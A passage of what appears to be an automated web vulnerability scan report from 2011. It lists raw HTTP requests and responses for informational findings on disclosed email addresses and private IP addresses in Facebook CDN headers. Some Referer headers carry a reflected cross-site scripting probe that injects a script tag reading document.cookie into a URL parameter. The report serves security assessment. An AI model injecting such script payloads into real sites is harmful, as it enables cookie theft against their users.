Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.68. http://www.primescratchcards.com/terms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /terms.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /terms.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 57383
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...

21.69. http://www.primescratchcards.com/underage.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /underage.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /underage.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20362
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<a href="mailto:support@PrimeScratchCards.com">support@PrimeScratchCards.com</a>
...[SNIP]...

21.70. http://www.primescratchcards.com.br/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com.br
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.primescratchcards.com.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 24365
Content-Type: text/html
Set-Cookie: pscref=; expires=Thu, 10-May-2012 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: MTH=1072%2D100%2Dpt; expires=Wed, 15-Jun-2011 11:46:50 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: plstat=0; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ARC=140053; expires=Tue, 15-May-2012 11:46:50 GMT; domain=.primescratchcards.com.br; path=/
Set-Cookie: ASPSESSIONIDCSTQTATQ=MKIMCHNDLBCPHFIMNELFEJOM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<a href="mailto:support@primescratchcards.com">support@primescratchcards.com</a>
...[SNIP]...
<!--/*********************************
* author@TechSystems.com *
* http://www.portaldepot.net *
* management@portaldepot.net *
* (c)TechSystems.com 2008 *
* All Rights Reserved. *
*********************************
*/

var delayS = 10; //Delay between iterations (fine tuning).
var scrollerD
...[SNIP]...

21.71. http://www.svenskalotter.com/Affiliates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Affiliates.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35179
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<a href="mailto:affiliates@svenskalotter.com" class="ContentLinks">affiliates@svenskalotter.com</a>
...[SNIP]...

21.72. http://www.svenskalotter.com/Charity.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Charity.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36042
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<a href="mailto:Charity@Svenskalotter.com" class="ContentLinks">Charity@Svenskalotter.com</a>
...[SNIP]...

21.73. http://www.verisign.co.uk/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.co.uk
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.verisign.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:15 GMT
Server: Apache
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Set-Cookie: v1st=3D2EA54A28A1F00A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29123

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<a href='mailto:channel-partners@verisign.com?tid=gnpartners'>
...[SNIP]...

22. Private IP addresses disclosed
There are 58 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
22.1. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "8d8820ae13b1e6c701a6f8a11096eff7"
X-FB-Server: 10.32.130.111
X-Cnection: close
Cache-Control: public, max-age=711
Expires: Mon, 16 May 2011 13:03:51 GMT
Date: Mon, 16 May 2011 12:52:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 118905

/*1305452631,169902703,JIT Construction: v378396,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

22.2. http://platform.ak.fbcdn.net/www/app_full_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.173.124

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=40a5266c63e9584b0f6822ab754056cb&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2Fpromotion_midle_right.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.173.124
X-Cnection: close
Content-Length: 11543
Cache-Control: public, max-age=31535854
Expires: Tue, 15 May 2012 12:44:49 GMT
Date: Mon, 16 May 2011 12:47:15 GMT
Connection: close

......JFIF.....d.d......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

22.3. http://platform.ak.fbcdn.net/www/app_full_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.187.115

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=b6e290a77e7489abaa4646b1edb43c5a&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2F5FreePromotion_ENG_GBP.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.187.115
X-Cnection: close
Content-Length: 12721
Cache-Control: public, max-age=31536000
Expires: Tue, 15 May 2012 12:45:04 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

......JFIF.....d.d......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

22.4. http://platform.ak.fbcdn.net/www/app_full_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.185.103

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=8acaaad959502459e4543d0d4c3f4be4&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2Finvite.png HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/png
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.185.103
X-Cnection: close
Content-Length: 20907
Cache-Control: public, max-age=31535945
Expires: Tue, 15 May 2012 12:44:09 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

.PNG
.
...IHDR.......t......j.|..
.iCCPicm..x..VgTS..=...BK@:...K...D.tQ    I.P...P.#*8....".....J.AED.
.T.    2......w#?t.[..z..:..........8...$@..#C ...y2bb......j@...-6''..7.......[L.l...q....|.O^..
...[SNIP]...

22.5. http://platform.ak.fbcdn.net/www/app_full_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.160.117

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=d8ff8d31efdfc563e51ce186f7f6d46e&src=http%3A%2F%2Fcreative.primegaming.com%2FGeneral%2FPSC_EN_GBP_0_500x380_252-new-facebook.gif HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/gif
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.160.117
X-Cnection: close
Content-Length: 58345
Cache-Control: public, max-age=31535942
Expires: Tue, 15 May 2012 12:44:06 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

GIF89a..|..$........................................ES7......vyx.E(......EVEerV696...ehf$'#&1c......9E7VYVDGC...WgW..x..........!.......(1%"...f.ewf.........k.X{.z...;PB......I|......jJb8..vo.v...UgH]
...[SNIP]...

22.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.136.196.120

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=906420395ace61b9dc37dbaf39ef3b3c&src=http%3A%2F%2Fwww.primescratchcards.com%2Fbanners%2Fargos%2F260x100.jpg HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.136.196.120
X-Cnection: close
Content-Length: 20212
Cache-Control: public, max-age=31536000
Expires: Tue, 15 May 2012 12:45:04 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

......JFIF.....H.H......ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=...U.xB....9................................desc...D...ybXYZ........bTRC..
...[SNIP]...

22.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /www/app_full_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.32.195.102

Request

GET /www/app_full_proxy.php?app=4949752878&v=1&size=o&cksum=ba483d359d51fe4d9b0e62eaebeb10c2&src=http%3A%2F%2Fwww.primescratchcards.com%2Fimages%2Fpearl.png HTTP/1.1
Host: platform.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: image/png
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: public
X-FB-Server: 10.32.195.102
X-Cnection: close
Content-Length: 32562
Cache-Control: public, max-age=31536000
Expires: Tue, 15 May 2012 12:45:04 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close

.PNG
.
...IHDR.......t......j.|..
.iCCPicm..x..VgTS..=...BK@:...K...D.tQ    I.P...P.#*8....".....J.AED.
.T.    2......w#?t.[..z..:..........8...$@..#C ...y2bb......j@...-6''..7.......[L.l...q....|.O^..
...[SNIP]...

22.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.145.199

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.145.199
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1408
Expires: Mon, 16 May 2011 13:13:12 GMT
Date: Mon, 16 May 2011 12:49:44 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

22.9. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y-/r/R9NKeEUZ860.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.148.189

Request

GET /rsrc.php/v1/y-/r/R9NKeEUZ860.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:59:55 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224016
Expires: Fri, 11 May 2012 22:05:16 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 33128

/*1305238021,169776317*/

.DOMControl_placeholder{color:#777}
.no_js .DOMControl_placeholder{color:#000}
.DOMControl_shadow{left:-10000px;position:absolute;top:-10000px;white-space:pre-wrap}
body{back
...[SNIP]...

22.10. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yC/r/29zADtiP5cm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.64.185

Request

GET /rsrc.php/v1/yC/r/29zADtiP5cm.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31224079
Expires: Fri, 11 May 2012 22:06:19 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 603

/*1305238022,176832697*/

.sp_9rjvzf{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z2/r/lQnr2lay0rR.png);background-repeat:no-repeat;display:inline-block;height:90px;width:190px}
.sx_902
...[SNIP]...

22.11. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.147.194

Request

GET /rsrc.php/v1/yC/r/6Lsyu5J6BKV.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 12 May 2011 22:00:25 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224143
Expires: Fri, 11 May 2012 22:07:23 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 22318

/*1305238023,169776066*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

22.12. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yG/r/13eVoEevxOb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.146.197

Request

GET /rsrc.php/v1/yG/r/13eVoEevxOb.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:24:11 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30894647
Expires: Tue, 08 May 2012 02:35:47 GMT
Date: Mon, 16 May 2011 12:45:00 GMT
Connection: close
Content-Length: 14206

/*1304908668,169775813*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
#captcha
...[SNIP]...

22.13. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yL/r/KI-TuOEwsYB.js

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.146.195

Request

GET /rsrc.php/v1/yL/r/KI-TuOEwsYB.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
